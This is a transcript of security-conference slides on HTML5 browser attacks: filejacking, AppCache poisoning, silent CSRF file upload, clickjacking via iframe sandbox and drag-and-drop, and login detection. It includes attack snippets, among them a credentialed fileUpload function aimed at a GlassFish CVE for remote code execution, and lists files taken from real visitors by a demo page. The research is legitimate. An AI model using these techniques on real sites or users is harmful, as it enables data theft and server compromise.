Something wicked this way comes - CONFidence
-
Upload
krzysztof-kotowicz -
Category
Technology
-
view
2.843 -
download
1
description
Transcript of Something wicked this way comes - CONFidence
![Page 2: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/2.jpg)
Plan
• HTML5 trickery• Filejacking
• AppCache poisoning
• Silent file upload
• IFRAME sandbox aniframebuster
• Don’t get framed!• Drag into
• Drag out content extraction
• Frame based login detection
• Wrap-up
2
![Page 3: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/3.jpg)
HTML5 trickery
3
![Page 4: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/4.jpg)
Filejacking
• HTML5 directory upload (Chrome only)
• displays this ====>
• JS gets read access toall files withinchosen folder
4
<input type=file directory>
![Page 5: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/5.jpg)
Filejacking
Business plan
• set up tempting webpage
• overlay input (CSS) with
• wait for clueless users
• get files & upload them to your server
5
![Page 6: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/6.jpg)
Filejacking
6
![Page 7: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/7.jpg)
Filejacking
7
![Page 8: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/8.jpg)
Filejacking
• How clueless users actually are?• http://kotowicz.net/wu running for ~13 mo
• very limited exposure
• only websec oriented visitors
• 298 clients connected (217 IPs)
• tons of interesting files
8
![Page 9: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/9.jpg)
Filejacking
LOTS of these ------>
• Downloads/# BeNaughtyLive.com/
• Downloads/# GoLiveTrannies.com/
• BratSluts 11 12 04 Sasha Cane Red Tartan SchoolGirl XXX 720p WMV SEXORS.nzb
• bitches/1300563524557.jpg
9
![Page 10: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/10.jpg)
Filejacking
10
• websec staff!
• but surely no private data?
![Page 11: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/11.jpg)
Filejacking
• Wireless Assess points.txt• interesting network next to me.txt• onlinePasswords.txt• s/pw.txt• letter of authorization.pdf• Staff-<name,surname>.pdf• <name,surname> - resume.doc• PIT-37, <name,surname>.PITY2010NG• Deklaracja_VAT7_Luty_2011.pdf• Pricing-Recommendation_CR.xlsm.zip
11
• but surely no clients data?
![Page 12: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/12.jpg)
Filejacking
• sony reports/0045_sonymusic.##.zip
• SecurityQA.SQL.Injection.Results.v1.1.docx
• SSOCrawlTest5.4.097.xml
• IPS CDE Wireless Audit-January 2011-1 0.docx
• IPS Wireless Testing Schedule April 2011.xls
• 01-####### Corporation (Security Unarmed Guard).xls
• Faktura_numer_26_2011_<company>.pdf
• websec cred~
• security_users.sql.zip
• !important - questions for web developers.docx
• sslstrip.log~
• ##### Paros Log.txt
So much for the NDAs...
12
![Page 13: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/13.jpg)
Filejacking
+ All your file are belong to me
+ Trivial to set up
+ Filter files by e.g. extension, size etc.
- Chrome only
- Requires users prone to social-engineering
13
![Page 14: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/14.jpg)
AppCache poisoning
HTML5 Offline Web Applications
<html manifest=cache.manifest>
• cache.manifest lists URLs to cache
• cache expires only whenmanifest is changed
14
CACHE MANIFESTindex.htmlstylesheet.cssimages/logo.pngscripts/main.js
![Page 15: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/15.jpg)
AppCache poisoning
• abuse to persist man-in-the-middle • manifest must be MIME text/cache-manifest
• Chrome fills AppCache without user confirmation
• two steps• poison AppCache while m-i-t-m
• have payloads stay forever in cache
15
![Page 16: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/16.jpg)
AppCache poisoning
• tamper http://victim/
• tamper http://victim/robots.txt
16
<html manifest=/robots.txt><script>evil()</script>
CACHE MANIFESTCACHE:http://victim/NETWORK:*
![Page 17: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/17.jpg)
AppCache poisoning
Later on, after m-i-t-m:
1. http://victim/ fetched from AppCache
2. browser checks for new manifestGET /robots.txt
3. receives text/plain robots.txt & ignores it
4. tainted AppCache is still used
17
![Page 18: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/18.jpg)
AppCache poisoning
+ Poison any URL
+ Payload stays until manually removed
- Chrome or Firefox with user interaction
- Needs active man-in-the-middle
18
https://github.com/koto/sslstrip
![Page 19: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/19.jpg)
Silent file upload
• File upload purely in Javascript
• Emulates <input type=file> with:• any file name
• any file content
• File constructed in Javascript(it’s not a real file!)
• Uses Cross Origin Resource Sharing
19
![Page 20: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/20.jpg)
Silent file upload
• Cross Origin Resource Sharing= cross domain AJAX
20
http://attacker.com/
var xhr = new XMLHttpRequest(); xhr.open("POST", "http://victim", true);xhr.setRequestHeader("Content-Type", "text/plain");xhr.withCredentials = "true"; // send cookiesxhr.send("Anything I want");
![Page 21: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/21.jpg)
Silent file upload
function fileUpload(url, fileData, fileName) { var boundary = "xxxxxxxxx", xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.withCredentials = "true"; xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
21
• raw multipart/form-data request
![Page 22: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/22.jpg)
Silent file upload
var b = "\--" + boundary + '\r\n\Content-Disposition: form-data;\ name="contents"; filename="' + fileName + '"\r\n\Content-Type: application/octet-stream\r\n\\r\n\' + fileData + '\r\n\--' + boundary + '--';
xhr.setRequestHeader("Content-Length", b.length);xhr.send(b);
22
![Page 23: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/23.jpg)
Silent file upload
+No user interaction
+Works in most browsers
+ You can add more form fields
- CSRF flaw needed
- No access to response
23
![Page 24: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/24.jpg)
Silent file upload
DEMO
Flickr.com
24
![Page 25: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/25.jpg)
Silent file upload
• GlassFish Enterprise Server 3.1.• CVE 2012-0550 by Roberto Suggi Liverani
• //goo.gl/cOu1FlogUrl = 'http://glassfishserver/management/domain/applications/application';
fileUpload(c,"maliciousarchive.war");
• logged admin + CSRF = RCE
25
![Page 26: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/26.jpg)
IFRAME sandbox aniframebuster
• Used to embed untrusted contentsandbox="allow-same-origin allow-scriptsallow-formsallow-top-navigation"
• prevents JS execution in frame
• prevents defacement
• Facilitates clickjacking!
26
![Page 27: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/27.jpg)
Clickjacking?
27
![Page 28: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/28.jpg)
28
http://attacker.com
<iframe sandbox="allow-forms allow-scripts" src="//victim"></iframe>
http://victim
top.location = self.location// doesn’t work:(
IFRAME sandbox aniframebuster
![Page 29: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/29.jpg)
+ Chrome / Safari / IE 10
+Will disable most JS framebusters
- X-Frame-Options
29
IFRAME sandbox aniframebuster
![Page 30: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/30.jpg)
Don’t get framed!
30
![Page 31: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/31.jpg)
Same origin policy
• makes web (relatively) safe• restricts cross-origin communication
• can be relaxed though• crossdomain.xml
• document.domain
• HTML5 Cross Origin Resource Sharing
• or ignored...• UI redressing
31
![Page 32: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/32.jpg)
UI Redressing?
Jedi mind tricks on victim users
32
![Page 33: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/33.jpg)
UI Redressing
• This is not the page you’re looking at
• This is not the thing you’re clicking
• .................................................. dragging
• .................................................. typing
• .................................................. copying
• Victims attack the applications for us
33
![Page 35: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/35.jpg)
Drag into
• Put attackers content into victim form
35
![Page 36: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/36.jpg)
Drag into
DEMO
Alphabet Hero
36
![Page 37: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/37.jpg)
Drag into
+ Inject arbitrary content
+ Trigger self-XSS
- Firefox only (will die soon!)
- X-Frame-Options
37
![Page 38: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/38.jpg)
Drag out content extraction
image
image
38
![Page 39: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/39.jpg)
Drag out content extraction
image
imagevictim<iframe>
39
![Page 40: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/40.jpg)
Drag out content extraction
textarea
imagevictim<iframe>
<textarea>
40
![Page 41: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/41.jpg)
Drag out content extraction
<div id=game style="position:relative"> <img style="position:absolute;..." src="paper.png" /> <img style="position:absolute;..." src="trash.png" /> <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe> <textarea style="position:absolute; opacity:0;..." id=dropper></textarea> </div>
41
![Page 42: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/42.jpg)
Drag out content extraction
42
![Page 43: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/43.jpg)
Drag out content extraction
43
![Page 44: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/44.jpg)
Drag out content extraction
+ Access sensitive content cross domain
- Firefox only (will die soon!)
- X-Frame-Options
44
![Page 45: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/45.jpg)
Frame-based login detection
• Are you now logged in to these websites?
• facebook.com
• amazon.com
• a-banking-site.secure
• Why should I care?• e.g. launch CSRF / other attacks
45
![Page 46: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/46.jpg)
Frame-based login detection
• Previous work:• Cache timing, lcamtuf
• Abusing HTTP Status Code, Mike Cardwell
• Anchor Element Position Detection, Paul Stone
46
<iframe src=//victim/#logout />
![Page 47: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/47.jpg)
Frame-based login detection
47
![Page 48: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/48.jpg)
Frame-based login detection
48
<iframe src="//victim/login">
<input id=login><script>document.getElementById('login').focus()</script>
//victim /login
![Page 49: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/49.jpg)
Frame-based login detection
49
DEMO
![Page 50: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/50.jpg)
Summary
• HTML5 is attacker’s friend too!
• Don’t get framed
• Users based pwnage FTW
Developers:
Use X-Frame-Options: DENY
50
![Page 51: Something wicked this way comes - CONFidence](https://reader033.fdocuments.net/reader033/viewer/2022052522/554bbb39b4c9053a298b4d2a/html5/thumbnails/51.jpg)
Wake up, I’m done!
• html5sec.org
• code.google.com/p/html5security
• www.contextis.co.uk/research/white-papers/clickjacking
• blog.kotowicz.net
• github.com/koto
Twitter: @kkotowicz
Thanks @0x6D6172696F, @garethheyes, @theKos, @7a_, @lavakumark, @malerisch, @skeptic_fx, ....
51